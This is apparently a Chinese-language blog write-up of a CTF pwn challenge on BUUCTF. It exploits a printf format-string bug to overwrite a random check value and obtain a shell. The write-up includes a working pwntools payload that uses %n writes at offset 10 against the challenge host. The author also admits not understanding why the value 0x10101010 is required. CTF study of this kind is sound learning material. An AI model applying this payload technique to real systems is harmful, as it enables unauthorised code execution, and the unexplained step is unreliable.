先checksec,开启了NX保护和Canary保护
也就意味着不能用栈溢出来攻击了
运行一下
放入ida中
查看main函数
我们可以看到只要令atoi(nptr) == dword_804C044就可以拿到权限
但dword_804C044是随机的,所以我们需要将它修改为我们想要的数据
看到了printf(buf); 说明存在格式化字符串漏洞
先计算偏移
我们可以算出偏移为10(从AAAA到41414141)
再看这个函数的长度 44~47 共4个字节
所以我们就可以用%10$n%11$n%12$n%13$n来修改该函数的内容
这里的10跟上面计算出的偏移量有关
关于偏移量的计算我是从这里学的
写payload
from pwn import*
p = remote('node4.buuoj.cn',28543)
#p = process("./note")
#binsh = "/bin/sh"
addr_dword_804C044 = 0x0804C044
addr_dword_804C045 = 0x0804C045
addr_dword_804C046 = 0x0804C046
addr_dword_804C047 = 0x0804C047
payload =p32(addr_dword_804C044)+p32(addr_dword_804C045)+p32(addr_dword_804C046)+p32(addr_dword_804C047)+'%10$n%11$n%12$n%13$n'
p.sendline(payload)
p.sendline(str(0x10101010))
p.interactive()
至于这里为什么非得是0x10101010而不能用其他数据,我也暂时没搞懂
其他的博主也没有明确的解释,只能暂时放着了
运行payload
拿到flag!